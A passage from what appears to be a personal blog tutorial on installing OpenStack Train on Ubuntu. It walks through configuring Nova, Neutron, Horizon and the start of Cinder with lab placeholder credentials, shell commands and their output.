+--------------+----------------------------------+
</code></pre></div></div>
<h3 id="installing-nova-on-the-controller">Installing Nova on the Controller</h3>
<p>Time to actually get some packages installed to the controller:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install nova-api nova-conductor nova-novncproxy nova-scheduler
</code></pre></div></div>
<p>From there, we will need to edit the configuration file and add database creds:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/nova/nova.conf
[api_database]
#connection = sqlite:////var/lib/nova/nova_api.sqlite
connection = mysql+pymysql://nova:password123@controller/nova_api
[database]
#connection = sqlite:////var/lib/nova/nova.sqlite
connection = mysql+pymysql://nova:password123@controller/nova
</code></pre></div></div>
<p>Then in the <code class="language-plaintext highlighter-rouge">[DEFAULT]</code> section, add:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[DEFAULT]
...
transport_url = rabbit://openstack:password123@controller:5672/
my_ip = 10.0.0.11
use_neutron = true
firewall_driver = nova.virt.firewall.NoopFirewallDriver
</code></pre></div></div>
<p>This sets rabbitmq as our messaging queue, and enables Neutron for networking.</p>
<p>Let’s set up Keystone authentication now:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[api]
auth_strategy = keystone
[keystone_authtoken]
www_authenticate_uri = http://controller:5000/
auth_url = http://controller:5000/
memcached_servers = controller:11211
auth_type = password
project_domain_name = Default
user_domain_name = Default
project_name = service
username = nova
password = openstack
</code></pre></div></div>
<p>While we are at it, set up Placement authentication:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[placement]
region_name = RegionOne
project_domain_name = Default
project_name = service
auth_type = password
user_domain_name = Default
auth_url = http://controller:5000/v3
username = placement
password = openstack
</code></pre></div></div>
<p>Only some more small changes left now. Lets configure the VNC proxy and glance:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[vnc]
enabled = true
server_listen = $my_ip
server_proxyclient_address = $my_ip
[glance]
api_servers = http://controller:9292
[oslo_concurrency]
lock_path = /var/lib/nova/tmp
</code></pre></div></div>
<p>Finally, we can populate the database with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "nova-manage api_db sync" nova
# su -s /bin/sh -c "nova-manage cell_v2 map_cell0" nova
# su -s /bin/sh -c "nova-manage cell_v2 create_cell --name=cell1 --verbose" nova
95c6eb23-8e22-43d0-b833-2c9c1758f4a6
# su -s /bin/sh -c "nova-manage db sync" nova
</code></pre></div></div>
<p>We can see if the two nova cell0 and cell1 cells are registered:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># su -s /bin/sh -c "nova-manage cell_v2 list_cells" nova
+-------+--------------------------------------+------------------------------------------+-------------------------------------------------+----------+
| Name | UUID | Transport URL | Database Connection | Disabled |
+-------+--------------------------------------+------------------------------------------+-------------------------------------------------+----------+
| cell0 | 00000000-0000-0000-0000-000000000000 | none:/ | mysql+pymysql://nova:****@controller/nova_cell0 | False |
| cell1 | 95c6eb23-8e22-43d0-b833-2c9c1758f4a6 | rabbit://openstack:****@controller:5672/ | mysql+pymysql://nova:****@controller/nova | False |
+-------+--------------------------------------+------------------------------------------+-------------------------------------------------+----------+
</code></pre></div></div>
<p>If everything went smoothly, We can finalise the install by restarting all the
nova services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart nova-api
$ sudo systemctl restart nova-scheduler
$ sudo systemctl restart nova-conductor
$ sudo systemctl restart nova-novncproxy
</code></pre></div></div>
<h3 id="installing-nova-to-the-compute-host">Installing Nova to the Compute Host</h3>
<p>Now we have Nova all set up on the controller, we need to get things running on
the compute host.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/nova/train/install/compute-install-ubuntu.html">Nova Compute Documentation</a>.</p>
<p>We can install the nova-compute package with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install nova-compute
</code></pre></div></div>
<p>After that, we will need to edit the nova configuration file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/nova/nova.conf
</code></pre></div></div>
<p>In the <code class="language-plaintext highlighter-rouge">[DEFAULT]</code> section, add rabbitmq creds as well as some other options
for Neutron networking:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[DEFAULT]
transport_url = rabbit://openstack:password123@controller
my_ip = 10.0.0.21
use_neutron = true
firewall_driver = nova.virt.firewall.NoopFirewallDriver
</code></pre></div></div>
<p>Let’s set up Keystone authentication:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[api]
auth_strategy = keystone
[keystone_authtoken]
www_authenticate_uri = http://controller:5000/
auth_url = http://controller:5000/
memcached_servers = controller:11211
auth_type = password
project_domain_name = Default
user_domain_name = Default
project_name = service
username = nova
password = openstack
</code></pre></div></div>
<p>While we are at it, Placement authentication:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[placement]
region_name = RegionOne
project_domain_name = Default
project_name = service
auth_type = password
user_domain_name = Default
auth_url = http://controller:5000/v3
username = placement
password = openstack
</code></pre></div></div>
<p>Next we can configure Glance, and the lockfile:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[glance]
api_servers = http://controller:9292
[oslo_concurrency]
lock_path = /var/lib/nova/tmp
</code></pre></div></div>
<p>Finally, we need configure the VNC proxy:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[vnc]
enabled = true
server_listen = 0.0.0.0
server_proxyclient_address = $my_ip
novncproxy_base_url = http://controller:6080/vnc_auto.html
</code></pre></div></div>
<p>For some virtual machines, we need to determine if it supports the virtualisation
extensions shipped in modern processors.</p>
<p>If you run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ egrep -c '(vmx|svm)' /proc/cpuinfo
1
</code></pre></div></div>
<p>You can see if the compute host supports these extensions. Mine returns 1, which
means I am either lucky or I have a bug, but anyway, my compute machine supports
hardware acceleration. If you get value of zero, you will need to add the
following to <code class="language-plaintext highlighter-rouge">/etc/nova/nova-compute.conf</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/nova/nova-compute.conf
[libvirt]
virt_type = qemu
</code></pre></div></div>
<p>I’m not doing this on my install, since my compute machine supports vmx.</p>
<p>When we are all done, we can finalise the install by restarting the nova-compute
service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart nova-compute
</code></pre></div></div>
<h3 id="discovering-the-compute-node-and-adding-it-to-the-controller">Discovering the Compute Node and Adding it to the Controller</h3>
<p>We are nearly done installing Nova, I promise. We need to go back to the
controller and discover the newly created compute host.</p>
<p>We need to be an admin for these tasks, so source the creds:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
</code></pre></div></div>
<p>We can ensure we can see the compute host and its nova-compute service by running:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack compute service list
+----+----------------+------------+----------+---------+-------+----------------------------+
| ID | Binary | Host | Zone | Status | State | Updated At |
+----+----------------+------------+----------+---------+-------+----------------------------+
| 3 | nova-scheduler | controller | internal | enabled | up | 2020-01-28T00:22:25.000000 |
| 4 | nova-conductor | controller | internal | enabled | up | 2020-01-28T00:22:30.000000 |
| 5 | nova-compute | compute | nova | enabled | up | 2020-01-28T00:22:32.000000 |
+----+----------------+------------+----------+---------+-------+----------------------------+
</code></pre></div></div>
<p>We see the compute host, next to the controller host. Great. Let’s enlist this
nova-compute service.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># su -s /bin/sh -c "nova-manage cell_v2 discover_hosts --verbose" nova
Found 2 cell mappings.
Skipping cell0 since it does not contain hosts.
Getting computes from cell 'cell1': 95c6eb23-8e22-43d0-b833-2c9c1758f4a6
Checking host mapping for compute host 'compute': 3098b6f9-5ea0-4085-838e-a269358bf8fb
Creating host mapping for compute host 'compute': 3098b6f9-5ea0-4085-838e-a269358bf8fb
Found 1 unmapped computes in cell: 95c6eb23-8e22-43d0-b833-2c9c1758f4a6
</code></pre></div></div>
<p>Each time we want to add a compute host, we need to run the above command.</p>
<p>We can also see a list of all currently installed and configured services by
querying the catalogue:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack catalog list
+-----------+-----------+-----------------------------------------+
| Name | Type | Endpoints |
+-----------+-----------+-----------------------------------------+
| glance | image | RegionOne |
| | | public: http://controller:9292 |
| | | RegionOne |
| | | admin: http://controller:9292 |
| | | RegionOne |
| | | internal: http://controller:9292 |
| | | |
| nova | compute | RegionOne |
| | | internal: http://controller:8774/v2.1 |
| | | RegionOne |
| | | admin: http://controller:8774/v2.1 |
| | | RegionOne |
| | | public: http://controller:8774/v2.1 |
| | | |
| placement | placement | RegionOne |
| | | internal: http://controller:8778 |
| | | RegionOne |
| | | public: http://controller:8778 |
| | | RegionOne |
| | | admin: http://controller:8778 |
| | | |
| keystone | identity | RegionOne |
| | | public: http://controller:5000/v3/ |
| | | RegionOne |
| | | internal: http://controller:5000/v3/ |
| | | RegionOne |
| | | admin: http://controller:5000/v3/ |
| | | |
+-----------+-----------+-----------------------------------------+
</code></pre></div></div>
<p>We currently have keystone, glance, placement and nova configured, and we can see
their endpoints.</p>
<h2 id="installing-neutron-the-networking-service">Installing Neutron, the Networking Service</h2>
<p>Neutron is the networking service for OpenStack. Neutron leverages built in
Linux networking functions through plugins and sub-services to provide virtual
networking to instances created by Nova.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/neutron/train/install/install-ubuntu.html">Installation Documentation for Ubuntu</a>.</p>
<h3 id="setting-up-the-database-and-service-accounts">Setting up the Database and Service Accounts</h3>
<p>For each OpenStack service we set up, we have to create a database, grant
privileges, and create service accounts. Neutron is no different. Head to the
controller node, and run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
MariaDB [(none)]> CREATE DATABASE neutron;
Query OK, 1 row affected (0.001 sec)
</code></pre></div></div>
<p>This makes the Neturon database. Let’s set up privileges:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB [(none)]> GRANT ALL PRIVILEGES ON neutron.* TO 'neutron'@'localhost' \
IDENTIFIED BY 'password123';
Query OK, 1 row affected (0.001 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON neutron.* TO 'neutron'@'%' \
IDENTIFIED BY 'password123';
Query OK, 1 row affected (0.001 sec)
</code></pre></div></div>
<p>From there, lets create some users and to set up the service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack user create --domain default --password-prompt neutron
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | ab6782079b3146eaa05d37e65e23cb43 |
| name | neutron |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --project service --user neutron admin
</code></pre></div></div>
<p>Let’s set up the service and the endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name neutron --description "OpenStack Networking" network
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | OpenStack Networking |
| enabled | True |
| id | 791b51052a5546a18f34b0d88b1ad55f |
| name | neutron |
| type | network |
+-------------+----------------------------------+
</code></pre></div></div>
<p>For the endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne network public http://controller:9696
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 02eaa3bda2c14776b78c219869e21c9f |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 791b51052a5546a18f34b0d88b1ad55f |
| service_name | neutron |
| service_type | network |
| url | http://controller:9696 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne network internal http://controller:9696
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 3b676e8beaaa4a5cbf90a4fc2fe4690f |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 791b51052a5546a18f34b0d88b1ad55f |
| service_name | neutron |
| service_type | network |
| url | http://controller:9696 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne network admin http://controller:9696
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | dcd64f08a346410aa1af89fdd3405406 |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 791b51052a5546a18f34b0d88b1ad55f |
| service_name | neutron |
| service_type | network |
| url | http://controller:9696 |
+--------------+----------------------------------+
</code></pre></div></div>
<h3 id="installing-neutron-to-the-controller">Installing Neutron to the Controller</h3>
<p>Let’s get some packages installed:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install neutron-server neutron-plugin-ml2 neutron-linuxbridge-agent \
neutron-dhcp-agent neutron-metadata-agent
</code></pre></div></div>
<p>Once everything is installed, we can edit the Neutron configuration file to
add database creds and change some basic settings.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/neutron/neutron.conf
[database]
#connection = sqlite:////var/lib/neutron/neutron.sqlite
connection = mysql+pymysql://neutron:password123@controller/neutron
</code></pre></div></div>
<p>Add the rabbitmq settings, and we also need to define the authentication
scheme:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[DEFAULT]
core_plugin = ml2
service_plugins =
transport_url = rabbit://openstack:password123@controller
auth_strategy = keystone
</code></pre></div></div>
<p>From there, we need to set up Keystone accounts:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = neutron
password = openstack
</code></pre></div></div>
<p>As always, make sure to use the correct password for the neutron account.</p>
<p>Since we will be using Neutron with Nova, we will configure Neutron to notify
Nova on any port status or configuration changes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[DEFAULT]
# ...
notify_nova_on_port_status_changes = true
notify_nova_on_port_data_changes = true
</code></pre></div></div>
<p>Now, lets add the Nova account information in:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[nova]
auth_url = http://controller:5000
auth_type = password
project_domain_name = default
user_domain_name = default
region_name = RegionOne
project_name = service
username = nova
password = openstack
</code></pre></div></div>
<p>We also need to set a lockfile path:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[oslo_concurrency]
lock_path = /var/lib/neutron/tmp
</code></pre></div></div>
<h4 id="configuring-the-ml2-networking-plugin">Configuring the ML2 Networking Plugin</h4>
<p>Our deployment will use the Modular Layer 2 plugin, since it uses underlying
Linux bridges to make layer 2 devices, such as bridges and switches in the
virtual network for instances.</p>
<p>Let’s edit some configuration:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/neutron/plugins/ml2/ml2_conf.ini
[ml2]
type_drivers = flat,vlan
tenant_network_types =
mechanism_drivers = linuxbridge
extension_drivers = port_security
[ml2_type_flat]
flat_networks = provider
[securitygroup]
enable_ipset = true
</code></pre></div></div>
<p>This sets things up such that the provider network is a flat network provided by
Linux bridges, and tenants cannot create their own networks.</p>
<h4 id="configuring-the-linux-bridge-agent">Configuring the Linux Bridge Agent</h4>
<p>When configuring the Linux bridge agent, we need to know what interface our
provider network is on. So go back to <code class="language-plaintext highlighter-rouge">/etc/netplan/50-cloud-init.yaml</code>, and
we can see that our provider network is <code class="language-plaintext highlighter-rouge">enp3s0</code>, since it has the <code class="language-plaintext highlighter-rouge">203.0.113.11</code>
IP address.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> enp3s0:
dhcp4: true
addresses: [203.0.113.11/24]
</code></pre></div></div>
<p>Great. From there, lets configure the bridge agent:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[linux_bridge]
physical_interface_mappings = provider:enp3s0
[vxlan]
enable_vxlan = false
[securitygroup]
enable_security_group = true
firewall_driver = neutron.agent.linux.iptables_firewall.IptablesFirewallDriver
</code></pre></div></div>
<p>We also need to check the <code class="language-plaintext highlighter-rouge">br_netfilter</code> kernel module is loaded, since that
is what implements bridges:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ lsmod | grep br_netfilter
br_netfilter 28672 0
bridge 176128 1 br_netfilter
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">br_netfilter</code> is already loaded for me.</p>
<p>We also need to make sure the following sysctl values are set, but they will be
on any Ubuntu release:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sysctl net.bridge.bridge-nf-call-iptables
net.bridge.bridge-nf-call-iptables = 1
$ sysctl net.bridge.bridge-nf-call-ip6tables
net.bridge.bridge-nf-call-ip6tables = 1
</code></pre></div></div>
<h4 id="configuring-the-dhcp-agent">Configuring the DHCP Agent</h4>
<p>We want our virtual network to provide a DHCP lease to our instances, so we
need to configure the DHCP agent:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/neutron/dhcp_agent.ini
[DEFAULT]
interface_driver = linuxbridge
dhcp_driver = neutron.agent.linux.dhcp.Dnsmasq
enable_isolated_metadata = true
</code></pre></div></div>
<h4 id="configuring-the-metadata-agent">Configuring the Metadata Agent</h4>
<p>The metadata agent is quite an important agent - it provides run time
configuration information to instances, things that can be consumed by services
like <code class="language-plaintext highlighter-rouge">cloud-init</code>, such as SSH keys and autostart scripts.</p>
<p>The metadata agent requires a shared secret, so we can generate one with openssl:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openssl rand -hex 10
9de15dd7b515ab242d20
</code></pre></div></div>
<p>This generates us a 10 byte long random secret, which we can use in our
configuration:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/neutron/metadata_agent.ini
[DEFAULT]
nova_metadata_host = controller
metadata_proxy_shared_secret = 9de15dd7b515ab242d20
</code></pre></div></div>
<h4 id="configure-nova-to-use-neutron-for-networking">Configure Nova to use Neutron for Networking</h4>
<p>Time to add some creds to Nova so it can communicate with Neutron:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/nova/nova.conf
[neutron]
auth_url = http://controller:5000
auth_type = password
project_domain_name = default
user_domain_name = default
region_name = RegionOne
project_name = service
username = neutron
password = openstack
service_metadata_proxy = true
metadata_proxy_shared_secret = 9de15dd7b515ab242d20
</code></pre></div></div>
<h4 id="finalise-by-populating-database-and-restarting-services">Finalise by Populating Database and Restarting Services</h4>
<p>We can populate the database on the controller with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "neutron-db-manage --config-file /etc/neutron/neutron.conf \
--config-file /etc/neutron/plugins/ml2/ml2_conf.ini upgrade head" neutron
</code></pre></div></div>
<p>Restart the Nova service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart nova-api
</code></pre></div></div>
<p>Restart the Neutron services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart neutron-server
$ sudo systemctl restart neutron-linuxbridge-agent
$ sudo systemctl restart neutron-dhcp-agent
$ sudo systemctl restart neutron-metadata-agent
</code></pre></div></div>
<h3 id="installing-neutron-to-the-compute-machine">Installing Neutron to the Compute Machine</h3>
<p>Most of the heavy lifting when installing Neutron was setting up the controller,
and like nova-compute, installing neutron to the compute machine seems straightforward.</p>
<p>Let’s install the package:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install neutron-linuxbridge-agent
</code></pre></div></div>
<p>And start some configuration. Note, we need to comment out the database section
since compute nodes do not directly connect to the Neutron database.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/neutron/neutron.conf
[database]
#connection = sqlite:////var/lib/neutron/neutron.sqlite
[DEFAULT]
core_plugin = ml2
transport_url = rabbit://openstack:password123@controller
auth_strategy = keystone
</code></pre></div></div>
<p>Let’s set up Keystone:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = neutron
password = openstack
</code></pre></div></div>
<p>And configure the lock path:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[oslo_concurrency]
lock_path = /var/lib/neutron/tmp
</code></pre></div></div>
<h4 id="configure-the-linux-bridge-agent-in-the-compute-machine">Configure the Linux Bridge Agent in the Compute Machine</h4>
<p>Similar to the controller, we need to tell Neutron the network interface we
are using. Again, check <code class="language-plaintext highlighter-rouge">/etc/netplan-50-cloud-init.yaml</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> enp3s0:
dhcp4: true
addresses: [203.0.113.21/24]
</code></pre></div></div>
<p>Mine says <code class="language-plaintext highlighter-rouge">enp3s0</code> like last time.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[linux_bridge]
physical_interface_mappings = provider:enp3s0
[vxlan]
enable_vxlan = false
[securitygroup]
enable_security_group = true
firewall_driver = neutron.agent.linux.iptables_firewall.IptablesFirewallDriver
</code></pre></div></div>
<p>Again, we need to ensure the <code class="language-plaintext highlighter-rouge">br_netfilter</code> module is loaded:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ lsmod | grep "br_netfilter"
br_netfilter 28672 0
bridge 176128 1 br_netfilter
</code></pre></div></div>
<p>And that the following sysctl entries are set to 1:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sysctl net.bridge.bridge-nf-call-iptables
net.bridge.bridge-nf-call-iptables = 1
$ sysctl net.bridge.bridge-nf-call-ip6tables
net.bridge.bridge-nf-call-ip6tables = 1
</code></pre></div></div>
<h4 id="configure-nova-to-use-neutron-for-networking-on-the-compute-machine">Configure Nova to use Neutron for Networking on the Compute Machine</h4>
<p>Some quick config to link Nova up with Neutron:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/nova/nova.conf
[neutron]
auth_url = http://controller:5000
auth_type = password
project_domain_name = default
user_domain_name = default
region_name = RegionOne
project_name = service
username = neutron
password = openstack
</code></pre></div></div>
<h4 id="restart-services">Restart Services</h4>
<p>We need to restart both the Nova and Neutron services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart nova-compute
$ sudo systemctl restart neutron-linuxbridge-agent
</code></pre></div></div>
<h3 id="verifying-that-neutron-was-installed-successfully">Verifying that Neutron was Installed Successfully</h3>
<p>We can do a quick check to check the status of the Neutron services. Head back
to the controller, and source the admin creds. From there run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack network agent list
+--------------------------------------+--------------------+------------+-------------------+-------+-------+---------------------------+
| ID | Agent Type | Host | Availability Zone | Alive | State | Binary |
+--------------------------------------+--------------------+------------+-------------------+-------+-------+---------------------------+
| 64f8361f-8948-4eec-9950-bf825923f250 | Metadata agent | controller | None | :-) | UP | neutron-metadata-agent |
| 898b76b2-da96-4ae3-838e-7aaf2d20a10b | Linux bridge agent | controller | None | :-) | UP | neutron-linuxbridge-agent |
| 97e09a16-ba6a-457e-9b35-866a36b4db52 | DHCP agent | controller | nova | :-) | UP | neutron-dhcp-agent |
| e49601df-6481-4e25-aee6-58256f4eae0d | Linux bridge agent | compute | None | :-) | UP | neutron-linuxbridge-agent |
+--------------------------------------+--------------------+------------+-------------------+-------+-------+---------------------------+
</code></pre></div></div>
<p>We can see our Neutron services listed, and alive. Great!</p>
<h2 id="installing-horizon-the-dashboard-service">Installing Horizon, the Dashboard Service</h2>
<p>When most end users interact with OpenStack, they think of Horizon, which is
the graphical webapp that users can use to interact with their OpenStack cluster.</p>
<p>Horizon pulls information in from other sources, and doesn’t have its own
database or other persistence mechanisms, so we can install it, configure it
and go.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/horizon/train/install/install-ubuntu.html">Horizon Install Documentation</a></p>
<p>We are going to install Horizon to the controller.</p>
<p>The package is a simple <code class="language-plaintext highlighter-rouge">apt install</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install openstack-dashboard
</code></pre></div></div>
<p>From there, we can do some configuration:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/openstack-dashboard/local_settings.py
OPENSTACK_HOST = "controller"
OPENSTACK_KEYSTONE_URL = "http://%s:5000/v3" % OPENSTACK_HOST
</code></pre></div></div>
<p>From there we need to allow any host to connect, note, leave the <code class="language-plaintext highlighter-rouge">ALLOWED_HOSTS</code>
in the <code class="language-plaintext highlighter-rouge">Ubuntu</code> section intact. At the commented one out at the top of the file,
make a new entry with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#ALLOWED_HOSTS = ['horizon.example.com', ]
ALLOWED_HOSTS = ['*', ]
</code></pre></div></div>
<p>You probably don’t want to do that for a production cluster, but we are just
making a toy cluster to learn how OpenStack works.</p>
<p>Onward to configuring memcached:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SESSION_ENGINE = 'django.contrib.sessions.backends.cache'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': 'controller:11211',
},
}
</code></pre></div></div>
<p>The main changes here is adding the “controller” location, and setting the
<code class="language-plaintext highlighter-rouge">SESSION_ENGINE</code>.</p>
<p>Back to some more changes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>OPENSTACK_API_VERSIONS = {
"identity": 3,
"image": 2,
"volume": 3,
}
OPENSTACK_KEYSTONE_DEFAULT_DOMAIN = "Default"
OPENSTACK_KEYSTONE_DEFAULT_ROLE = "user"
</code></pre></div></div>
<p>Since we configured a provider network and disallow users from creating their
own L3 network topologies, we need to disable L3 networking services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>OPENSTACK_NEUTRON_NETWORK = {
'enable_auto_allocated_network': False,
'enable_distributed_router': False,
'enable_fip_topology_check': False,
'enable_ha_router': False,
'enable_ipv6': False,
# TODO(amotoki): Drop OPENSTACK_NEUTRON_NETWORK completely from here.
# enable_quotas has the different default value here.
'enable_quotas': False,
'enable_rbac_policy': True,
'enable_router': False,
'enable_lb': False,
'enable_firewall': False,
'enable_vpn': False,
}
</code></pre></div></div>
<p>From there we have one small change to apache2:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ /etc/apache2/conf-available/openstack-dashboard.conf
WSGIApplicationGroup %{GLOBAL}
</code></pre></div></div>
<p>In my case, the line was already present and I did not need to do anything.</p>
<p>To get Horizon up and running, we just need to restart the service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart apache2
</code></pre></div></div>
<p>Let’s test Horizon out. Open up a web browser, and head to:
<a href="http://10.0.0.11/horizon">http://10.0.0.11/horizon</a>. Hopefully you see:</p>
<p><img src="/assets/images/2020_006.png" alt="login" /></p>
<p>Woohoo! Now we are getting places. Do you like that branded dashboard. I do.</p>
<p>Lets login. Log in with the admin user, aka <code class="language-plaintext highlighter-rouge">admin</code> and <code class="language-plaintext highlighter-rouge">openstack</code>.</p>
<p><img src="/assets/images/2020_007.png" alt="horizon" /></p>
<p>Isn’t that a sight for sore eyes? Soon we will be rewarded by being able to
launch our first instance from Horizon. Only a few more services to go now.</p>
<h2 id="installing-cinder-the-block-storage-service">Installing Cinder, the Block Storage Service</h2>
<p>Cinder is OpenStack’s block storage service, and it offers persistent block
storage devices for virtual machines. It implements a simple scheduler to
determine which storage node a particular block storage request should be
fulfilled on, much like nova-scheduler.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/cinder/train/install/index-ubuntu.html">Cinder Install Documentation</a>.</p>
<h3 id="setting-up-cinder-databases-and-services-on-the-controller">Setting Up Cinder Databases and Services on the Controller</h3>
<p>We need to establish the Cinder database and create the OpenStack service
definitions on the controller.</p>
<p>Let’s make the database and grant privileges:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
MariaDB [(none)]> CREATE DATABASE cinder;
Query OK, 1 row affected (0.013 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON cinder.* TO 'cinder'@'localhost' \
IDENTIFIED BY 'password123';
